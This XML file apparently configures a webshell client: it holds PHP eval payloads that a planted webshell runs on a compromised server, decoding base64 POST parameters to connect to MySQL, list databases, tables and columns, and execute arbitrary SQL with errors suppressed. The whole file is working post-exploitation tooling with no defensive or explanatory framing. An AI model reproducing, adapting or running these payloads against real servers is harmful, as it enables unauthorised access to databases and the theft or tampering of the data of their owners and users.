<?xml version="1.0" encoding="utf-8"?>
<customShellType>
  <funcCodeSetting>
    <func>
      <name>GetDbName</name>
	  <type>phpEval</type>
	  <path>/DbManager/mysql</path>
	  <funcParam location="Body" encrymode="Base64" >connStr</funcParam>
      <item><![CDATA[@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$C=base64_decode($_POST["$connStr$"]);
list($host,$user,$pwd,$lan)=split(";",$C);
$T=@mysql_connect($host,$user,$pwd);
$q=@mysql_query("SHOW DATABASES");
while($rs=@mysql_fetch_row($q))
{
	echo(trim($rs[0]).chr(9));
}
@mysql_close($T);
echo("|<-");
die();]]></item>
    </func>
	<func>
      <name>GetTableName</name>
	  <type>phpEval</type>
	  <path>/DbManager/mysql</path>
	  <funcParam location="Body" encrymode="Base64" >connStr</funcParam>
	  <funcParam location="Body" encrymode="Base64" >dbName</funcParam>
      <item><![CDATA[@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$C=base64_decode($_POST["$connStr$"]);
$db=base64_decode($_POST["$dbName$"]);
list($host,$user,$pwd,$lan)=split(";",$C);
$T=@mysql_connect($host,$user,$pwd);
$q=@mysql_query("SHOW TABLES FROM `{$db}`");
while($rs=@mysql_fetch_row($q))
{
	echo(trim($rs[0]).chr(9));
}
@mysql_close($T);
echo("|<-");
die();]]></item>
    </func>
	<func>
      <name>GetColumnType</name>
	  <type>phpEval</type>
	  <path>/DbManager/mysql</path>
	  <funcParam location="Body" encrymode="Base64" >connStr</funcParam>
	  <funcParam location="Body" encrymode="Base64" >dbName</funcParam>
	  <funcParam location="Body" encrymode="Base64" >columnName</funcParam>
      <item><![CDATA[@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$C=base64_decode($_POST["$connStr$"]);
$db=base64_decode($_POST["$dbName$"]);
$col=base64_decode($_POST["$columnName$"]);
list($host,$user,$pwd,$lan)=split(";",$C);
$T=@mysql_connect($host,$user,$pwd);@mysql_select_db($db);
$q=@mysql_query("SHOW COLUMNS FROM `{$col}`");
while($rs=@mysql_fetch_row($q))
{
	echo(trim($rs[0])." (".$rs[1].")".chr(9));
}
@mysql_close($T);
echo("|<-");
die();]]></item>
    </func>
	<func>
      <name>ExecuteReader</name>
	  <type>phpEval</type>
	  <path>/DbManager/mysql</path>
	  <funcParam location="Body" encrymode="Base64" >connStr</funcParam>
	  <funcParam location="Body" encrymode="Base64" >dbName</funcParam>
	  <funcParam location="Body" encrymode="Base64" >sqlStr</funcParam>
      <item><![CDATA[@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$C=base64_decode($_POST["$connStr$"]);
$db=base64_decode($_POST["$dbName$"]);
$sql=base64_decode($_POST["$sqlStr$"]);
list($host,$user,$pwd,$lan)=split(";",$C);
$T=@mysql_connect($host,$user,$pwd);
@mysql_query("SET NAMES utf8");
@mysql_select_db($db);
$q=@mysql_query($sql);
$i=0;
while($col=@mysql_field_name($q,$i))
{
	echo($col."\t|\t");$i++;
}
echo("\r\n");
while($rs=@mysql_fetch_row($q))
{
	for($c=0;$c<$i;$c++)
	{
		echo(trim($rs[$c]));
		echo("\t|\t");
	}
	echo("\r\n");
}
@mysql_close($T);
echo("|<-");
die();]]></item>
    </func>
	<func>
      <name>ExecuteNonQuery</name>
	  <type>phpEval</type>
	  <path>/DbManager/mysql</path>
	  <funcParam location="Body" encrymode="Base64" >connStr</funcParam>
	  <funcParam location="Body" encrymode="Base64" >dbName</funcParam>
	  <funcParam location="Body" encrymode="Base64" >sqlStr</funcParam>
      <item><![CDATA[@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$C=base64_decode($_POST["$connStr$"]);
$db=base64_decode($_POST["$dbName$"]);
$sql=base64_decode($_POST["$sqlStr$"]);
list($host,$user,$pwd,$lan)=split(";",$C);
$T=@mysql_connect($host,$user,$pwd);
@mysql_query("SET NAMES utf8");
@mysql_select_db($db);
$q=@mysql_query($sql);
echo("Result\t|\t\r\n");
echo($q?"Execute Successfully!":mysql_error());
echo("\t|\t\r\n");
@mysql_close($T);
echo("|<-");
die();]]></item>
    </func>
  </funcCodeSetting>
</customShellType>